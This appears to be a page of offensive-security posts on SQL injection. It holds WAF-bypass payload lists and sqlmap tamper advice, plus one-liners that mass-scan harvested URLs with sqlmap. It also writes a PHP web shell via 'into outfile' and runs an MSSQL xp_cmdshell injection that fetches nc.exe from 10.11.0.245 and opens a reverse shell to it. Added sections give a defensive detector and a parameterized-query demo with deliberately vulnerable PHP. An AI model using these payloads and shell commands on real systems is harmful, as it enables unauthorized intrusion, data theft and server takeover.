ExploitQuest
Bypass waf firewall

To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.


Using Substitutions in Keywords

You can substitute words like or, xor, and || to disable security filters.
Example:

or sleep(4) ➔ oR sLeEP(4) or xor sleep(4)


Entering camouflaged spaces and comments

Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:

or sleep(4) ➔ or/**/sleep(4) or or sLeEp(/**/4)


using mathematical expressions

Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:

4 ➔ 6-2 or true+true


Changing the simple formula

The formula for simple payloads can also be changed.
Example:

sleep(4) ➔ sleep((4)) or benchmark(4)


Mixing multiple payloads in a single request

You can combine two or more payloads to increase complexity.
Example:

%27 or sleep(4) -- ➔ %27 oR sLeEP(4) || true+true --
4|0 or benchmark(4) ➔ (4|0) oR beNCHMark(/**/4)



Entering different parentheses

Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:

or (sleep(4)) ➔ or %28sleep%284%29


Using Uncommon Phrases

Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:

or sleep(4) ➔ or benchmark(4)


Logical Construct Tests

You can also test loads with logical constructs.
Example:


or sleep(4) ➔ or (sleep(4) && true=true)



Complete example:

' oR sLeEP(/**/4) || true+true --



Here are some more random payloads to use in your SQL injection test:

'%27 OR sleep(4) --
%28%29 XOR sLeEp(4) --
(4|0) oR beNCHMark(/**/4) --
' OR 6-2=4 || sleep(4) --
') OR true+true=sleep(4) --
%27 oR sLeEp(4) = (true) --
' xor sLeEP((4)) --
%27 = (1=(sleep(4))) --
%28%29 OR beNcHmArk(4) --
' XOR sleep(/**/4) || -true*4 --



Combine some of these payloads:

You can mix payloads together to make the attack more complex:


'%27 OR sleep(4) || (true=true) -- ')


These payloads randomly diversify attacks that may pass through some filters or protection methods.


#waf #sql
Methods for finding SQLi vulnerabilities:

Command Line Tools Like a Pro

1. sublist3r -d target | tee -a domains.txt

2. cat domains.txt | httpx | tee -a alive.txt

3. cat alive.txt | waybackurls | tee -a urls.txt

4. gf sqli urls.txt >> sqli.txt

5. sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent


#sqli #sql
SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#sql
Transition from SQL injection to shell or backdoor

We use the “into outfile” command to write to a file:


' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' # 

We capture the request in Burp Proxy and save it to the post-request file, then run sqlmap:

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

Reverse netcat shell via MSSQL injection when xp_cmdshell is available:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

#sql #shell
In SQLMap, the tamper module plays a crucial role by modifying or "tampering" with the SQL queries sent to the database. This helps bypass security mechanisms such as Web Application Firewalls (WAFs) or detection systems.

Tamper scripts manipulate SQL queries in various ways, making them less recognizable to security filters or even allowing the queries to slip through undetected. Here are some commonly used tamper scripts in SQLMap:


1- space2comment

Converts spaces in the query to comments (/**/) to make it less obvious to security mechanisms.

2- charunicodeencode

Encodes characters in the query into Unicode format, helping to evade detection by some systems.

3- between

Uses the BETWEEN operator instead of = for comparisons in the query, which can bypass basic filters.

4- randomcase

Randomly changes the case of characters (uppercase/lowercase) in the query to make pattern recognition harder.

5- apostrophemask

Escapes single quotes (') by adding a backslash (\) before them to avoid detection.

6- equaltolike

Replaces = with LIKE in the query to bypass filters that detect equality operators.

7- space2dash

Converts spaces into dashes (--), which are considered comments in SQL, making the query less recognizable.

8- versionedkeywords

Adds version comments to SQL keywords, for example, turning SELECT into SELECT/*version*/, which can evade simple keyword filters.


You can use tamper modules in SQLMap by specifying the --tamper option. For example:


sqlmap -u "http://example.com/vuln.php?id=1" --tamper="space2comment"



Each tamper script serves a specific purpose, and it's often necessary to experiment with different ones depending on the target's security mechanisms.


#sql #waf
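Every evasion in the WAF-bypass post above (random case, /**/ and /*!...*/ comments, URL and %u encoding, parenthesis tricks, --junk newline separators) and every tamper script just listed works only against a filter that matches the raw request string. The standard countermeasure is to normalize the value first and match afterwards. The following Python is an added example written for this page; it is not sqlmap code and not any WAF product's rule set. It assumes the input is one parameter value as the application receives it after form decoding; `normalize`, `detect`, `RULES` and the sample payloads are constructed for the example, and the last two attack samples cover the `into outfile` and `xp_cmdshell` shapes from the shell post above.

```python
import re
import urllib.parse

# Hypothetical normalizer + rule set (added example, not sqlmap's or any WAF's code).
# Input is a single parameter value as the application sees it after form decoding.


def normalize(value: str, max_decode: int = 3) -> str:
    """Undo the evasion tricks so that one lowercase, decoded, comment-free string is matched."""
    s = value
    for _ in range(max_decode):
        # %uXXXX escapes (charunicodeencode style) are not standard URL encoding; decode them first.
        s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
        decoded = urllib.parse.unquote(s)  # repeated to unwrap double/triple encoding
        if decoded == s:
            break
        s = decoded
    # /*!...*/ is executed by MySQL (versionedkeywords): keep the content, drop the markers.
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    # Ordinary block comments are ignored by the DB (space2comment): treat them as a space.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # '--junk<newline>' (space2dash) is a line comment ending at the newline: just a separator.
    s = re.sub(r"--[^\n]*\n", " ", s)
    # randomcase and varied whitespace collapse to one canonical form.
    return re.sub(r"\s+", " ", s.lower()).strip()


# Rules are applied to the normalized string, so case, comments and encoding no longer matter.
RULES = {
    "time_function":      re.compile(r"\b(sleep|benchmark)\s*\("),
    "quote_then_boolean": re.compile(r"""['")]\s*(\bor\b|\bxor\b|\band\b|\|\||&&)"""),
    "tautology":          re.compile(r"\b(\w+)\s*(=|\blike\b)\s*\1\b|\bnot\s+between\s+0\s+and\b"),
    "comment_terminator": re.compile(r"(--|#)\s*$"),
    "union_select":       re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "file_write":         re.compile(r"\binto\s+(out|dump)file\b"),
    "os_command":         re.compile(r"\bxp_cmdshell\b"),
}


def detect(value: str) -> list[str]:
    """Return the names of the rules the normalized value triggers (empty list = nothing found)."""
    norm = normalize(value)
    return [name for name, rx in RULES.items() if rx.search(norm)]


# Constructed samples: payload shapes taken from the posts above, followed by two benign values.
SAMPLES = [
    "%27 oR sLeEP(/**/4) || true+true --",            # case, comment, encoding, boolean, terminator
    "or %28sleep%284%29",                              # URL-encoded parentheses
    "1--abc\nOR--xyz\nsleep(4)",                       # space2dash-style separators
    "1 /*!UNION*/ /*!SELECT*/ 1,2",                    # versioned keyword comments
    "%u0027 OR 1=1 --",                                # %u-encoded quote plus tautology
    "1000'; exec master.dbo.xp_cmdshell 'echo x';--",  # stacked query reaching the OS
    "' union select 1,2 into outfile '/tmp/x' #",      # file write of the kind used to drop a web shell
    "O'Reilly",                                        # benign apostrophe
    "hello world",                                     # benign
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:52} -> {normalize(s)!r:42} {detect(s)}")
```

The point of the design is that none of the rules mentions case, encoding or comments at all: once `normalize` has run, the tamper output and the plain payload are the same string, so adding a new evasion to the list above does not require a new rule, only a new normalization step.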
SQL injection: what is it and what is it used for? SQL injection is an attack that can lead to sensitive data being compromised and even an entire system takeover. It is important for developers and system administrators to be aware of this threat and take the necessary measures to prevent it. Using prepared statements with parameterized queries, input validation and sanitization, and regular security checks can significantly reduce the risk of a successful attack. Here is an example of code vulnerable to SQL injection:


<?php
// $connection is assumed to be an open mysqli link created earlier in the script

// Get username and password from the request
$username = $_POST["username"];
$password = $_POST["password"];

// Create SQL query to check credentials
// (vulnerable on purpose: user input is concatenated straight into the SQL text)
$query = "SELECT * FROM users
WHERE username = '$username'
AND password = '$password'";

// Execute the query
$result = mysqli_query($connection, $query);

// Check if the login was successful
if (mysqli_num_rows($result) > 0) {
    // Login successful
    // Here you can redirect the user to the homepage or show a welcome message
} else {
    // Login failed
    // Here you can display an error message
}
?>



In this example, the PHP script attempts to authenticate the user by checking the username and password against the entries in the Users table. However, there is a significant issue with this code: it directly includes user input (the $username and $password) in the SQL query without properly validating or sanitizing it.

Vulnerability

This lack of validation means that if malicious input is entered in the username or password fields, it may lead to unintended commands being executed. For instance, if an attacker inputs:


username: admin' --


The resulting SQL query would look like this:

SELECT * FROM users WHERE username = 'admin' --' AND password = 'whatever_password_entered'



In this case, the -- sequence comments out the rest of the SQL query, effectively bypassing the password verification. As a result, the attacker could gain unauthorized access.

Prevention

To eliminate this vulnerability, user input must be validated and processed correctly. One effective method is to use parameterized query statements. This approach ensures that user input is treated as data rather than executable code. The modified query would look like this:


$stmt = $connection->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$stmt->store_result();
$login_ok = ($stmt->num_rows > 0); // same check as before, now on the bound result





By using parameterized queries, the user input is treated as a string, preventing SQL injection attacks.
Conclusion

Always validate and sanitize user inputs and utilize parameterized queries to enhance the security of your applications against SQL injection attacks.


#sql
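To make the post's point concrete, here is an added Python example (written for this page, not the author's PHP) that runs the vulnerable and the parameterized login side by side against an in-memory SQLite database, using the post's own `admin' --` input. It also goes one step beyond the post: the schema above stores passwords in plain text, so the example additionally stores a salted PBKDF2 hash and verifies it in application code after a parameterized lookup by username only. `make_db`, the `admin`/`s3cret` sample row, `ITERATIONS` and the function names are constructed for the example.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 200_000  # PBKDF2 work factor; constructed choice for this example


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return 'salt$digest' (hex) using PBKDF2-HMAC-SHA256 with a random 16-byte salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one user, kept both as plain text (to mirror the PHP
    snippet) and as a salted hash (the form a real application should store)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin", "s3cret", hash_password("s3cret")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Same defect as the PHP example: user input is spliced into the SQL text, so
    # "admin' --" closes the string and comments out the password check.
    query = f"SELECT 1 FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders: the driver passes the values separately from the SQL text, so
    # "admin' --" is compared literally as a username and matches nothing.
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def login_hashed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterized lookup by username only; the secret comparison happens in code,
    # so the database never holds or compares the plaintext password.
    row = conn.execute("SELECT password_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = make_db()
    attack_user, attack_pw = "admin' --", "whatever_password_entered"
    print("vulnerable, injected input :", login_vulnerable(db, attack_user, attack_pw))
    print("parameterized, injected    :", login_parameterized(db, attack_user, attack_pw))
    print("parameterized, real creds  :", login_parameterized(db, "admin", "s3cret"))
    print("hashed, real creds         :", login_hashed(db, "admin", "s3cret"))
    print("hashed, wrong password     :", login_hashed(db, "admin", "wrong"))
```

SQLite, like MySQL, treats `--` as a line comment, so the first call succeeds without a valid password exactly as the post describes; the same input through the parameterized query is just a seven-character username that no row has.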
One-liner to find SQL injection

cat subs.txt | (gau || hakrawler || katana || waybackurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done

#sql
SQL maps generator

Link site

#sql